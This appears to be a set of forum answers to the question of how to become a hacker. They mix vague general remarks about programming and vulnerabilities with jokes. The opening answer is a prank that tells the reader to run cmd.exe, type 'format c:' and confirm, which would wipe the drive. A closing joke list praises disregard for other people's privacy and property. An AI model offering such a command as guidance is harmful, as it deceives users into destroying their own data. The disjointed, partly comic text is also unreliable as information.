To become a hacker, go to Start->Run, type cmd.exe in the box and hit enter. Your 3133t h4x0r console will appear. Type format c: in the window, answer yes and you will officially be qualified.

First of all through education (specifically programming/software development) people learn how an operating system work. They are often tasked to write their own operating systems and compilers.
Through this specialized knowledge they often learn how to improve performances in their own systems. So they hack the code to make it work better.
In doing so some people also learn that the existing code, is vulnerable to outside users. Using thes exploits is cracking.
Either case it's a fine line. Depending on what you do with your knowledge.
To specifically answer your question there are two things you need to know if you want to hack.
1) Details about how the operating system you want to hack works.
2) A programming language that will allow you to alter the code.
As you begin to learn both of these - you'll discover the vulnerabilities and be able to do your own hacking.

In general hackers are programmers who choose to hack. They understand the underlying programs well enough to get into them and add or change things.
This can be learned in the traditional way, i.e. go to school and get an education is software programming. You can also be taught specific hacking techniques from someone who already knows them, i.e. someone can show you how to do a specific task and you don't need to know anything more than how to follow directions

2. Love to rub peanut butter on yourself and have your cat lick it off
3. Have a complete disregard for other peoples privacy and property
